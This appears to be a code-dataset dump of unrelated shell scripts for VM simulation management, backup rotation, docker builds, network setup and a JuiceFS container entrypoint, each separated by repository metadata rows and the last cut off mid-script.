# vmrun x -- launch VM #x (prepared with 'vmsetup x') inside a detached
# screen session named "sim<x>". Reads the SIM_DESC tag out of simulate<x>.sh
# and attaches the hdb/hdc disks to qemu only when their image files exist.
function vmrun() {
    if [ -z "$1" ] ; then
        echo "Specify a number"
        return
    fi
    __vmpushd "$MARSS_DIR"
    # sed sure is hard to read ... this just grabs the argument of SIM_DESC= from the simulate file
    local SIM_DESCRIPTION=`cat simulate$1.sh | sed -n -e 's/^#SIM_DESC="\([^"]*\)"/\1/p '`
    if [ -z "$SIM_DESCRIPTION" ] ; then
        echo "No sim description in simulate$1.sh -- did you use vmsetup? (not launching sim)"
        __vmpopd
        return
    fi
    if [ ! -f "hda$1.qcow2" ] ; then
        echo "ERROR: hda$1.qcow2 not found; can't start VM"
        # BUGFIX: balance the __vmpushd above on this early-return path too,
        # otherwise the caller is left in $MARSS_DIR with a dirty dir stack.
        __vmpopd
        return
    fi
    local hdb_string=""
    if [ -f "hdb$1.qcow2" ] ; then
        hdb_string="-hdb hdb$1.qcow2"
    fi
    local hdc_string=""
    if [ -f "hdc$1.raw" ] ; then
        # BUGFIX: this branch used to assign hdb_string, clobbering the -hdb
        # option and leaving hdc_string permanently empty.
        hdc_string="-hdc hdc$1.raw"
    fi
    echo "Launching simulation #$1: $SIM_DESCRIPTION"
    local CMD_TO_RUN="SIM_DESC=\"$SIM_DESCRIPTION\" gdb -x gdbrun -args qemu/qemu-system-x86_64 -m 2GB -net nic,model=ne2k_pci -net user -simconfig \"simconfig$1.cfg\" -hda \"hda$1.qcow2\" $hdb_string $hdc_string -curses"
    # Detached screen session so many VMs can run concurrently.
    screen -d -m -S "sim$1" bash -c "$CMD_TO_RUN"
    __vmpopd
}
# vmclean x -- delete all per-VM artifacts (disk images, stats, logs,
# configs, simulate script) for VM #x from $MARSS_DIR.
function vmclean() {
    if [ -z "$1" ] ; then
        echo "specify a number"
        return
    fi
    __vmpushd "$MARSS_DIR"
    for artifact in "hda$1.qcow2" "hdb$1.qcow2" "hdc$1.raw" \
                    "run$1.stats" "run$1.log" "simconfig$1.cfg" "simulate$1.sh"
    do
        rm "$artifact"
    done
    __vmpopd
}
# vmsetup x [description] [shared|private] [nohdb] -- setup vm x with a sim description
# This command creates the necessary files, copies a simulate.sh file into the hdc disk image which can be auto launched if the VM is setup the right way.
# This function does the heavy lifting of this script -- if it sounds interesting, send dramninjas (at) gmail (dot) com an email and I can explain how
# the disk images are supposed to be set up for this to work right
function vmsetup() {
    # Prepare everything VM #$1 needs: a simconfig file, an hdc image
    # carrying simulate.sh (auto-run inside the guest), and qcow2 clones
    # of the hda/hdb base images. See the header comment above for usage.
    if [ $# -lt 1 ] ; then
        echo "usage: $0 sim_number [sim_description] [shared|private] [nohdb]"
        return
    fi
    local usehdb=1
    local cache_config_string=""
    if [ "$3" == "shared" ] ; then
        cache_config_string="-cache-config-type shared_L2"
    fi
    if [ "$4" == "nohdb" ] ; then
        usehdb=0
    fi
    __vmpushd "$MARSS_DIR"
    #setup the simconfig file
    # NB: heredoc content must stay flush-left; it is written verbatim.
    cat > simconfig$1.cfg <<EOF
-stats run$1.stats
-logfile run$1.log
-corefreq 2000000000
$cache_config_string
EOF
    local SIMULATE_FILE_SRC="simulate$1.sh"
    local SIMULATE_FILE_DEST="$MOUNT_POINT/simulate.sh"
    if [ -e "$SIMULATE_FILE_SRC" ] ; then
        # Tag the simulate script with a SIM_DESC line (read back by vmrun)
        # unless one is already present.
        if [ -z "`grep 'SIM_DESC' $SIMULATE_FILE_SRC`" ] ; then
            if [ -z "$2" ] ; then
                echo "please provide a sim description"
                return
            else
                echo "#SIM_DESC=\"$2\"" >> $SIMULATE_FILE_SRC
            fi
        fi
        # Fresh hdc copy per VM; mount it and drop simulate.sh inside.
        cp "$IMAGE_DIR/hdc.raw" "hdc$1.raw"
        __mount_image "hdc$1.raw"
        echo "Copying $SIMULATE_FILE_SRC to $SIMULATE_FILE_DEST"
        sudo cp "$SIMULATE_FILE_SRC" "$SIMULATE_FILE_DEST"
        __umount_image
    else
        echo "WARNING: using default simulate.sh"
    fi
    local images_to_clone="hda hdb"
    if [ $usehdb == 0 ] ; then
        images_to_clone="hda"
    fi
    for img in $images_to_clone
    do
        local OUTPUT_IMG_NAME="${img}$1.qcow2"
        #FIXME: need to do an lsof first to make sure the image isn't being used by a simulation before trying to do this
        # local BASE_IMG_NAME="$IMAGE_DIR/${img}0.qcow2"
        # if [ -e "$BASE_IMG_NAME" ] ; then
        # echo "copying $BASE_IMG_NAME to $OUTPUT_IMG_NAME"
        # cp "$BASE_IMG_NAME" "$OUTPUT_IMG_NAME"
        # else
        vmclone "$IMAGE_DIR/$img.raw" "$OUTPUT_IMG_NAME"
        # fi
    done
    __vmpopd
}
# vmmultirun x y -- setup and run VMs numbered x to y
# vmmultirun x y -- set up and launch VMs numbered x through y inclusive.
function vmmultirun () {
    if [ $# -lt 2 ] ; then
        echo "usage: $0 start end"
        return
    fi
    # C-style counting loop instead of spawning `seq`.
    for (( i = $1; i <= $2; i++ ))
    do
        vmsetup "$i"
        vmrun "$i"
    done
}
# vmchroot -- mount the base image and chroot into it
# this is useful for mounting the root image and using it
# without having to actually start up QEMU. Things like
# installing packages or compiling
function vmchroot() {
    # Mount the base image, bind /proc, /sys and /dev inside it, and drop
    # into an interactive root chroot; everything is torn down in reverse
    # order once that shell exits.
    __mount_image $IMAGE_PATH;
    __mount_proc_sys_dev;
    sudo chroot $MOUNT_POINT
    __unmount_proc_sys_dev;
    vmumount;
}
################## Utility functions #########################
# so I'm not sure why something like dirname $HOME returns /home when I'd
# expect it to return /home/USER, but I need to make a function that is sane --
# i.e. if the argument is a path to a file, return the directory the file is in,
# but if the directory is already a directory, just return the absolute path to it
# __absdirname <path> -- absolute-path flavour of dirname: for a directory
# print its own absolute path, for a file print the absolute path of the
# directory containing it.
function __absdirname() {
    local target="$1"
    if [ ! -d "$target" ] ; then
        target=$(dirname "$target")
    fi
    # BUGFIX: the original wrapped this in `echo $(__abspath ...)` with the
    # dirname result unquoted, which word-splits paths containing spaces.
    # __abspath already prints the result, so call it directly and quoted.
    __abspath "$target"
}
# __abspath <path> -- print the absolute path of <path> (when it is a
# directory) or of the directory containing it, by cd-ing there and
# reading $PWD.
function __abspath() {
    local DIR
    if [ -d "$1" ] ; then
        DIR="$1"
    else
        DIR=$(dirname "$1")
    fi
    # BUGFIX: quote "$DIR" and "$PWD" so paths with whitespace survive.
    __vmpushd "$DIR"
    echo "$PWD"
    __vmpopd
}
# __mount_image [image] -- loop-mount partition 1 of a raw disk image at
# $MOUNT_POINT. With no (existing) argument, falls back to the configured
# base image ($IMAGE_DIR/$IMAGE_NAME).
function __mount_image () {
    local PARTITION_NUM=1
    if [ -e "$1" ] ; then # a real filename given
        local FILENAME=$( basename "$1" )
        local FILE_DIR=$( __absdirname "$1" )
    else
        # BUGFIX: the fallback referenced $IMAGE_FILE, which is never
        # defined anywhere in this file; the configured default at the top
        # of the file is $IMAGE_NAME.
        local FILENAME="$IMAGE_NAME"
        local FILE_DIR="$IMAGE_DIR"
    fi
    local PARTITION_TYPE="ext2"
    echo "Mounting $PARTITION_TYPE partition: image=$FILE_DIR/$FILENAME to $MOUNT_POINT ... "
    # Partition start in 512-byte sectors, pulled from the partition table.
    local OFFSET=`sfdisk -l -uS "$FILE_DIR/$FILENAME" 2> /dev/null | grep "$FILENAME$PARTITION_NUM" | awk '{print $2}'`
    # Byte offset handed to the loop mount.
    local SECTOR_OFFSET=$((OFFSET*512))
    sudo mount -t $PARTITION_TYPE -o loop,offset=$SECTOR_OFFSET "$FILE_DIR/$FILENAME" "$MOUNT_POINT"
}
function __umount_image () {
    # Unmount $MOUNT_POINT. Hop to $HOME first so the unmount cannot fail
    # merely because our own cwd sits inside the mount point.
    echo -n "unmounting image from $MOUNT_POINT ... "
    __vmpushd $HOME
    sudo umount "$MOUNT_POINT";
    __vmpopd
    # Flush pending writes to the backing image file before reporting OK.
    sync
    echo "OK"
}
function __mount_proc_sys_dev () {
    # Bind-mount the host's /proc, /sys and /dev into the image so a chroot
    # behaves like a normal system; /dev/pts must come after /dev since it
    # lives underneath it.
    sudo mount -o bind /proc "$MOUNT_POINT/proc"
    sudo mount -o bind /dev "$MOUNT_POINT/dev"
    sudo mount -o bind /sys "$MOUNT_POINT/sys"
    sudo mount -o bind /dev/pts "$MOUNT_POINT/dev/pts"
    # Give the chroot working DNS resolution.
    sudo cp /etc/resolv.conf "$MOUNT_POINT/etc/resolv.conf"
}
# Undo __mount_proc_sys_dev: remove the bind mounts in reverse order
# (/dev/pts before /dev, which contains it).
function __unmount_proc_sys_dev () {
    # Consistency: use the file's quiet pushd/popd helpers like every
    # other function here, instead of raw pushd/popd with redirections.
    __vmpushd $HOME
    sudo umount "$MOUNT_POINT/dev/pts"
    sudo umount "$MOUNT_POINT/dev"
    sudo umount "$MOUNT_POINT/sys"
    sudo umount "$MOUNT_POINT/proc"
    __vmpopd
}
# get rid of the annoying output of these commands
# Quiet pushd: change directory, remembering the old one on the stack.
function __vmpushd() {
    pushd "$1" > /dev/null
}
# Quiet popd: return to the directory saved by the matching __vmpushd.
function __vmpopd() {
    popd > /dev/null
}
| true
|
b1fbc27db70578a14c50fd85b6ae77a3c74ce111
|
Shell
|
AC9090/wipe-script
|
/make-USB.sh
|
UTF-8
| 369
| 2.53125
| 3
|
[] |
no_license
|
#!/bin/bash
# GD Sept 2019
# This script moves other scripts into the working chroot directory, then
# builds that chroot into an initrd and then runs the ISO burn utility
# to build a bootable USB drive
#
# BUGFIX: every cd is now guarded — running the sudo build steps from the
# wrong directory (after a silently failed cd) would operate on the wrong tree.
cd ~/Documents/wipe-script || exit 1
sudo ./move_it.sh
cd ramdisk_work || exit 1
sudo ./build.sh
sudo mintstick -m iso
cd ~/Documents/wipe-script || exit 1
echo
echo "Build Complete"
echo
exit
| true
|
580c42d057fcba93f0b7dba50b39aa872ed77d5e
|
Shell
|
chain2future-os/future-core-scripts
|
/futureio-tn_bounce.sh
|
UTF-8
| 1,332
| 4
| 4
|
[] |
no_license
|
#!/bin/bash
#
# futureio-tn_bounce is used to restart a node that is acting badly or is down.
# usage: futureio-tn_bounce.sh [arglist]
# arglist will be passed to the node's command line. First with no modifiers
# then with --replay and then a third time with --resync
#
# the data directory and log file are set by this script. Do not pass them on
# the command line.
#
# in most cases, simply running ./futureio-tn_bounce.sh is sufficient.
#
# BUGFIX: guard the pushd — if $FUTUREIO_HOME is unset or wrong, every later
# step would silently run against the caller's current directory.
pushd "$FUTUREIO_HOME" || exit 1
if [ ! -f programs/nodfuture/nodfuture ]; then
    echo unable to locate binary for nodfuture
    exit 1
fi
config_base=etc/futureio/node_
if [ -z "$FUTUREIO_NODE" ]; then
    # Auto-detect the node id from the single etc/futureio/node_NN directory.
    DD=$(ls -d ${config_base}[012]?)
    ddcount=$(echo $DD | wc -w)
    if [ $ddcount -ne 1 ]; then
        echo $HOSTNAME has $ddcount config directories, bounce not possible. Set environment variable
        echo FUTUREIO_NODE to the 2-digit node id number to specify which node to bounce. For example:
        echo FUTUREIO_NODE=06 $0 \<options\>
        cd -
        exit 1
    fi
    # The node id is the last two characters of the directory name.
    OFS=$((${#DD}-2))
    export FUTUREIO_NODE=${DD:$OFS}
else
    DD=${config_base}$FUTUREIO_NODE
    # BUGFIX: quote "$DD" so the test cannot word-split or glob.
    if [ ! -d "$DD" ]; then
        echo no directory named $PWD/$DD
        cd -
        exit 1
    fi
fi
bash "$FUTUREIO_HOME/scripts/futureio-tn_down.sh"
# BUGFIX: forward arguments verbatim — "$@" preserves each argument as one
# word where the old $* re-split anything containing whitespace.
bash "$FUTUREIO_HOME/scripts/futureio-tn_up.sh" "$@"
| true
|
134477945d206077ee51fdbcb249df680e7db432
|
Shell
|
Nobatek/vmbackup
|
/vmbackuprotate
|
UTF-8
| 2,867
| 4.3125
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/bash

#####################################
## Rotate virtual machines backups ##
#####################################

# Print command-line help on stdout.
usage ()
{
    echo ''
    echo 'Usage : vmbackuprotate <config file path>'
    echo '    config file path: path to configuration file'
    echo ''
}

# If wrong number of arguments, print usage and exit
[ $# -ne 1 ] && { usage; exit 1; }

# Parameters
# ----------
# Default values
# Day of the week for weekly backup (1 is monday, 7 is sunday)
WEEKLY_DAY_OF_WEEK=7
# Keep daily backups for N days
DAILY_BACKUPS_LIFETIME=7
# Keep weekly backups for N weeks
WEEKLY_BACKUPS_LIFETIME=4
# Names of VM to backup
# (if not found in config file, no VM to backup)
VM_NAMES=""
# Remote directories to synchronize
# (if not found in config file, no remote dir to synchronize)
REMOTE_DIRS=""

# Source config file (overrides defaults)
# BUGFIX: quoted so a config path containing spaces still sources correctly.
source "$1"

## Check directories are defined (no default values for those)
if [[ -z $VM_DIR ]]; then { echo >&2 "Missing parameter VM_DIR in config file"; exit 3; }; fi
if [[ -z $BAK_DIR ]]; then { echo >&2 "Missing parameter BAK_DIR in config file"; exit 3; }; fi

# Script
# ------
# Create backup dirs if they don't exist
DAILY_DIR="$BAK_DIR/daily"
WEEKLY_DIR="$BAK_DIR/weekly"
mkdir -p "$DAILY_DIR" && mkdir -p "$WEEKLY_DIR" || { echo >&2 "Error creating backup directories. Aborting."; exit 4; }

# Make backups
for vm in $VM_NAMES     # word-splitting intended: whitespace-separated list
do
    echo "Backup $vm..."
    # Backup VM ($(...) replaces the old backticks; all paths quoted)
    BAK_FILENAME="${vm}_$(date +%y%m%d).qcow2"
    BAK_FILEPATH="$BAK_DIR/$BAK_FILENAME"
    vmbackup "$VM_DIR" "$vm" "$BAK_FILEPATH" || { echo >&2 "Backup failed for $vm "; continue; }
    # Move backup to daily directory
    mv "$BAK_FILEPATH" "$DAILY_DIR"
    # If today is weekly backup, hard link to "weekly" directory
    if [ "$(date +%u)" -eq "$WEEKLY_DAY_OF_WEEK" ]
    then
        ln "$DAILY_DIR/$BAK_FILENAME" "$WEEKLY_DIR"
    fi
done

# Get rid of old backups
# LIFETIME = 0 means "do not delete backups, keep them permanently"
# The script does not run every week at the exact same time of day, so we
# subtract 6 hours to deal with this approximation
if [ "$DAILY_BACKUPS_LIFETIME" -gt 0 ]; then
    find "$DAILY_DIR" -mmin +$(( (DAILY_BACKUPS_LIFETIME * 24 - 6 ) * 60 )) -delete
fi
if [ "$WEEKLY_BACKUPS_LIFETIME" -gt 0 ]; then
    find "$WEEKLY_DIR" -mmin +$(( (WEEKLY_BACKUPS_LIFETIME * 7 * 24 - 6 ) * 60 )) -delete
fi

# Synchronize remote directories
for remote in $REMOTE_DIRS    # word-splitting intended
do
    echo "Synchronize $remote..."
    # A 'vmbackup' directory is created in each remote dir
    # Hardcoding a subdirectory name is not elegant, but it is a simple measure to avoid wreaking havoc
    # in the system if entering / as remote dir by mistake in the config file.
    ionice -c2 -n7 nice -n19 rsync -a -H --delete --progress --sparse "$BAK_DIR/" "$remote/vmbackup" || { echo >&2 "Synchronization failed for $remote"; continue; }
done

exit 0
| true
|
33732aa3387ff28003b79fceb65cc95f2fff7ccd
|
Shell
|
helderco/docker-php
|
/versions/7.2/init.d/xdebug.sh
|
UTF-8
| 214
| 3.203125
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# Toggle the xdebug PHP extension based on the USE_XDEBUG env var.
set -e

case "$USE_XDEBUG" in
    yes)
        # Install the shipped xdebug ini snippets (-n keeps existing files).
        cp -n /usr/local/etc/php/xdebug.d/* /usr/local/etc/php/conf.d/
        ;;
    *)
        # Strip any xdebug configuration so the extension stays disabled.
        find /usr/local/etc/php/conf.d -name '*xdebug*' -delete
        ;;
esac
| true
|
50d7535d6c2c6debbc4229434bfd1b46194111be
|
Shell
|
circuitfox/dotfiles
|
/bin/pulsectl
|
UTF-8
| 631
| 3.28125
| 3
|
[] |
no_license
|
#!/bin/sh
# Volume/mute control for the currently-active PulseAudio sink.

# Index of the sink pacmd marks with '* index:' (the active/default sink).
PACIDX=$(pacmd list-sinks | grep -e '\* index:' | awk '{print $3}')

case $1 in
    # BUGFIX: "$PACIDX" is quoted so pactl's argument list stays intact
    # even if the index lookup produced nothing (SC2086).
    'u') pactl set-sink-volume "$PACIDX" +5% ;;
    'U') pactl set-sink-volume "$PACIDX" +10% ;;
    'd') pactl set-sink-volume "$PACIDX" -5% ;;
    'D') pactl set-sink-volume "$PACIDX" -10% ;;
    'm') pactl set-sink-mute "$PACIDX" toggle ;;
    *)
        echo 'USAGE: pulsectl.sh [cmd]'
        echo '    u increase volume of current sink by 5%'
        echo '    U increase volume of current sink by 10%'
        echo '    d decrease volume of current sink by 5%'
        echo '    D decrease volume of current sink by 10%'
        ;;
esac
exit 0
| true
|
b5907e3ee8a2029efc6043597ccb85b031ec0483
|
Shell
|
wendyi/continuousSecurityCsharp
|
/talisman.sh
|
UTF-8
| 182
| 2.53125
| 3
|
[] |
no_license
|
# Emit "<ref> <HEAD sha> <ref> <root sha>" on one line, mimicking the
# ref/sha pairs a git pre-push hook receives on stdin.
branch_ref="refs/heads/master/ "
head_commit="$(git rev-parse HEAD)"
root_commit="$(git rev-list HEAD | tail -n 1)"
printf '%s' "$branch_ref"
printf '%s' "$head_commit"
printf '%s' " $branch_ref"
printf '%s' "$root_commit"
| true
|
cdb7e5b0428e3873962a8b7eef0d54acd51b20ec
|
Shell
|
dp28/dotfiles
|
/src/git/include_config.sh
|
UTF-8
| 363
| 3.234375
| 3
|
[
"MIT"
] |
permissive
|
#! /usr/bin/env bash
# Ensure the user's ~/.gitconfig [include]s the versioned git config shipped
# with these dotfiles. Idempotent: the stanza is appended at most once.

versioned_config=$DOTFILES_HOME/src/git/config
local_config=~/.gitconfig

if [ -f "$local_config" ] ; then
    # BUGFIX: the original used '2>&1 > /dev/null', which redirects stderr to
    # the *terminal* (the old stdout) and only then silences stdout. Ordering
    # the redirections as '> /dev/null 2>&1' silences both streams.
    if ! grep "$versioned_config" "$local_config" > /dev/null 2>&1 ; then
        echo "[include]" >> "$local_config"
        echo "    path = $versioned_config ;" >> "$local_config"
    fi
else
    cp "$versioned_config" "$local_config"
fi

unset versioned_config
| true
|
f31e08da37c156d96ce066551eb5bdfeb4865c4a
|
Shell
|
Suleman-Elahi/GOMP
|
/test/create_git_history.sh
|
UTF-8
| 551
| 2.59375
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# Build a small synthetic git history (a 'main' branch plus a 'feature'
# branch that periodically cherry-picks from main) for use as a test
# fixture. The resulting .git directory is renamed to 'test_history'.

# Create an empty marker file and commit the whole tree as "Commit <label>".
function fakecommit {
    touch $1.temp
    git add .
    git commit -m "Commit $1"
}

git init
# Work on 'main'; delete the default 'master' branch.
git checkout -b main
git branch -D master
fakecommit 0
fakecommit 1
fakecommit 2
git checkout -b feature
fakecommit a
fakecommit b
git checkout main
fakecommit I
fakecommit II
fakecommit 3
git checkout feature
# main@{0} is reflog syntax for the most recent commit main pointed at,
# i.e. cherry-pick main's tip onto feature.
git cherry-pick main@{0}
fakecommit c
git checkout main
fakecommit III
fakecommit IV
fakecommit 4
git checkout feature
git cherry-pick main@{0}
fakecommit d
git checkout main
fakecommit V
fakecommit VI
# Preserve the repository metadata as the fixture; drop the marker files.
mv .git test_history
rm *.temp
|
52b6e2f06034c6789d4b5e792f9b12a185d7be82
|
Shell
|
Kaijun/dashboard
|
/build/run-gulp-in-docker.sh
|
UTF-8
| 1,389
| 3.515625
| 4
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
# Copyright 2017 The Kubernetes Dashboard Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

# This is a script that runs gulp in a docker container,
# for machines that don't have nodejs, go and java installed.

DOCKER_RUN_OPTS=${DOCKER_RUN_OPTS:-}
DASHBOARD_IMAGE_NAME="kubernetes-dashboard-build-image"
DEFAULT_COMMAND=${DEFAULT_COMMAND:-"node_modules/.bin/gulp"}
DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"

# Always test if the image is up-to-date. If nothing has changed since last build,
# it'll just use the already-built image
# (paths quoted: the checkout directory may contain spaces)
docker build -t ${DASHBOARD_IMAGE_NAME} -f "${DIR}/Dockerfile" "${DIR}/../"

# Run gulp in the container in interactive mode and expose necessary ports automatically.
# DOCKER_RUN_OPTS / DEFAULT_COMMAND stay unquoted on purpose: they may hold
# several words that must split into separate arguments.
# BUGFIX: "$@" forwards each script argument intact; a bare $@ re-split
# arguments containing whitespace.
docker run \
    -it \
    --rm \
    --net=host \
    -v /var/run/docker.sock:/var/run/docker.sock \
    ${DOCKER_RUN_OPTS} \
    ${DASHBOARD_IMAGE_NAME} \
    ${DEFAULT_COMMAND} "$@"
| true
|
1147edcdb68cef6371ec0eba8755b1c007c06d66
|
Shell
|
Ken-Leo/MIPSfpga
|
/programs/linux_scripts/01_compile_c_to_assembly.sh
|
UTF-8
| 525
| 2.578125
| 3
|
[] |
no_license
|
## Compile C to ASM
## Usage: in sub-programs directory (eg. 00_counter) type "sh ../linux_scripts/01_compile_c_to_assembly.sh"
## @author Andrea Guerrieri - andrea.guerrieri@studenti.polito.it ing.guerrieri.a@gmail.com
## @file 01_compile_c_to_assembly.sh

# Compiler flags:
#   -EL            little-endian output
#   -march=m14kc   MIPSfpga = MIPS microAptiv UP based on MIPS M14Kc
#   -msoft-float   should not use floating-point processor instructions
#   -O2            optimization level
#   -S             compile to assembly (emits main.s instead of an object file)
mips-mti-elf-gcc -EL -march=m14kc -msoft-float -O2 -S main.c
| true
|
073538b8c1899b744e5bbdc5a5473eaa3ea645a5
|
Shell
|
ICTU/pipes
|
/entrypoint.sh
|
UTF-8
| 227
| 2.53125
| 3
|
[] |
no_license
|
#!/bin/sh
# Wait (polling every 2s) until the interface named in $IF_NAME is up,
# then run dhcpcd on it in the foreground, exporting the registration
# settings into the dhcpcd hook environment.

while true ; do
    # BUGFIX: "$IF_NAME" is quoted — if it were empty/unset, the unquoted
    # expansion would collapse out of grep's argument list entirely.
    if [ "$(ip link show | grep "$IF_NAME" | grep 'state UP')" != "" ] ; then break ; fi
    sleep 2
done

ip a
# -e exports extra variables into dhcpcd's hook scripts.
# NOTE(review): flag meanings (-t timeout, -L, -B foreground, -4 IPv4-only)
# assumed from dhcpcd(8) — confirm against the installed version.
dhcpcd -t 3600 -L -B -4 -e DNSREG_SOCKET="$DNSREG_SOCKET" -e NET_PREFIX="$NET_PREFIX" "$IF_NAME"
ip a
| true
|
6a7ff3089d3b8f49b64e61004a34dea2b0e5a171
|
Shell
|
gobbledygook88/eclib-data
|
/atkin/parallel/4/replace.sh
|
UTF-8
| 528
| 3.75
| 4
|
[] |
no_license
|
#!/bin/bash
# Merge updated runtimes into an existing data file: for every "key value"
# line in NEW_FILE, rewrite the matching "key ..." line of OLD_FILE in
# place with the new value.

# Old file (updated in place)
OLD_FILE="tmanin_runtimes-serial-50000-60000.dat"
# New file (source of replacement values)
NEW_FILE="tmanin_runtimes-serial-high.dat"

# Single pass over NEW_FILE: read the key (column 1) and value (column 2)
# directly instead of re-scanning the whole file with awk twice per line
# as the original did (O(n^2) file reads -> O(n)).
while read -r KEY VAL _; do
    # Skip blank lines defensively.
    [ -n "$KEY" ] || continue
    # Replace the whole "KEY ..." line in the old file.
    sed -i -e "s/^${KEY} .*/${KEY} ${VAL}/" "$OLD_FILE"
done < "$NEW_FILE"
| true
|
4b16698641e425af8792b41fca0b6d7a2cf67f84
|
Shell
|
lordgloom/linux_desktop_config
|
/scripts/dmenu_run_r
|
UTF-8
| 311
| 3.0625
| 3
|
[] |
no_license
|
#!/bin/sh
# a special version of dmenu_run that remembers the most-recently used items
# and shows them first when the menu first pops up

RECENT_FILE="${1:-$HOME/.dmenu.recent}"

{
    # BUGFIX: '[ -s ... ]' replaces the bash-only '[[ -s ... ]]' — this
    # script declares #!/bin/sh, where '[[' is not guaranteed to exist.
    [ -s "$RECENT_FILE" ] && cat "$RECENT_FILE"
    dmenu_path
} \
    | dmenu "$@" \
    | dmenu_recent \
    | ${SHELL:-"/bin/sh"} &
| true
|
64dc187b462e387e02ead8c3a59dde3b824a38b6
|
Shell
|
terminusdb-labs/terminusdb-scripts
|
/push_docker_terminusdb.sh
|
UTF-8
| 322
| 2.671875
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
# Build and push the terminusdb-server docker image for a given branch.
# Usage: push_docker_terminusdb.sh <branch>

BRANCH=$1
# Random suffix keeps concurrent runs from clobbering each other's checkout.
TERMINUSDB_FOLDER="${BRANCH}_${RANDOM}"

git clone https://github.com/terminusdb/terminusdb.git --branch "$BRANCH" --single-branch "$TERMINUSDB_FOLDER"
# BUGFIX: abort when the clone/cd failed — otherwise the build would run
# against whatever directory we happened to be in and push a wrong image.
cd "$TERMINUSDB_FOLDER" || exit 1
sudo docker buildx build . -t "terminusdb/terminusdb-server:$BRANCH"
sudo docker push "terminusdb/terminusdb-server:$BRANCH"
| true
|
8433c97180fa62f0154486fdfec3fb7d70608073
|
Shell
|
baharxy/_pi_scripts
|
/wifiScan/setManaged
|
UTF-8
| 586
| 2.78125
| 3
|
[] |
no_license
|
#!/bin/bash
# Switch wlan0 from monitor mode (mon0) back to managed mode, bring it up,
# drop any metric-bearing default route, and e-mail the resulting IP.

sudo ifconfig mon0 down
sudo iw dev mon0 del
sudo iw phy phy0 interface add wlan0 type managed
sudo ifdown wlan0
sudo ifup wlan0
iw dev

# Find a default route that carries an explicit metric (if any).
metric=$(sudo ip route show | grep default | grep metric)
# BUGFIX: the original 'first_elem= $($metric | awk ...)' had a space after
# '=' and tried to *execute* the captured route text as a command, and its
# unquoted '[ -n $first_elem ]' test was always true. Test the captured
# route line directly instead.
if [ -n "$metric" ]; then
    # Word-splitting of $metric is intentional here: the route line expands
    # into the argument list that 'ip route del' expects.
    sudo ip route del $metric
fi
sleep 1

WIFI_IP_ADDR_MASK=$(ip -4 addr show dev wlan0 | grep inet | awk '{print $2}')
# $WIFI_IP_ADDR_MASK is left unquoted on purpose: if the interface has
# several addresses, the echo joins them onto one line as before.
staticip=$(echo $WIFI_IP_ADDR_MASK | awk -F'/' '{print $1}')
echo "My IP address is going to be: $staticip" | mail -s RPI_IP baharp@mit.edu
| true
|
b939220126ecce15ddbe8a4bbafa0a80189a0687
|
Shell
|
ekanai/timetree-todays-events-to-slack
|
/terraform/around_terraform.sh
|
UTF-8
| 523
| 3.75
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/sh
# Symlink (before) or unlink (after) the files of every resources.* dir
# into the current directory, prefixed with the dir path (slashes -> '_').
# Usage: around_terraform.sh before|after

directories=$(find . -name "resources.*" -maxdepth 2 -type d)

# BUGFIX: $directories is a plain (possibly empty) string; the original
# tested ${#directories[@]}, an array expansion that is invalid POSIX sh
# and, under bash, is 1 for any scalar — so the guard never fired.
if [ -z "$directories" ]; then
    echo "target is nothing"
    exit 0
fi

for directory in $directories    # word-splitting intentional: one dir per word
do
    # "./x/resources.y" -> "x_resources.y". The original's 's%.%%' deleted
    # an arbitrary first character; anchor the leading "./" explicitly.
    prefix=$(echo "$directory" | sed -e 's%^\./%%' -e 's%/%_%g')
    # Plain files only (grep -v / drops the trailing-slash directory entries).
    # NOTE(review): ls -F also decorates executables with '*' — confirm the
    # resource files are plain, as the original made the same assumption.
    for file in $(ls -F "$directory" | grep -v /)
    do
        if [ "before" = "$1" ]; then
            ln -s "$directory/$file" "$prefix.$file"
        fi
        if [ "after" = "$1" ]; then
            unlink "$prefix.$file"
        fi
    done
done
| true
|
a3457cbd97d56d1994dec8c9a054f61d49a170e4
|
Shell
|
jheredianet/dockerfiles
|
/juicefs/entrypoint.sh
|
UTF-8
| 1,346
| 3.4375
| 3
|
[] |
no_license
|
#!/bin/bash
set -e
# Abort entire script if any command fails

# S3QL_EXPORTER_ID=""

# Signal handler: force-unmount the JuiceFS volume on SIGINT/SIGTERM so
# the container shuts down cleanly.
function disconnect() {
    echo "unmounting $MOUNTPOINT"
    juicefs umount --force "$MOUNTPOINT"
    echo "Stop Success!!"
}

# Cache Size
# NOTE(review): multiplies the env value by 1024*1024 — presumably a unit
# conversion for juicefs --cache-size; confirm against the juicefs docs.
export CACHE_SIZE=$((${CACHE_SIZE}*1024*1024))

# Log Files (all kept under the cache directory)
mkdir -p "$CACHE_PATH"
export REDIS_LOGFILE="$CACHE_PATH/redis.log"
export RCLONE_LOGFILE="$CACHE_PATH/rclone.log"
export JUICE_LOGFILE="$CACHE_PATH/juiceFS.log"

# Update log files (create them so the tail -f below never fails)
touch $REDIS_LOGFILE
touch $RCLONE_LOGFILE
touch $JUICE_LOGFILE

# Create a temporary mountpoint and mount file system
mkdir -p "$MOUNTPOINT"
echo "mount juiceFS to $MOUNTPOINT"

# Enable Redis (metadata engine) only when a config file is provided.
if [ -f "/config/redis.conf" ]; then
    sysctl vm.overcommit_memory=1
    redis-server /config/redis.conf --logfile $REDIS_LOGFILE &
    sleep 5
fi

# Enable Webdav: expose a remote via rclone when MOUNTCONFIG is set.
# $RCLONE_OPTIONS is intentionally unquoted (may hold several options).
if [[ -n "$MOUNTCONFIG" ]]
then
    rclone serve webdav \
        --config $CONFIG \
        --addr localhost:8080 \
        --log-file="$RCLONE_LOGFILE" \
        $RCLONE_OPTIONS \
        $MOUNTCONFIG:$MOUNTPATH &
    sleep 5
fi

# Mount the volume in the background (-d); $JUICEFS_OPTIONS and $META_DATA
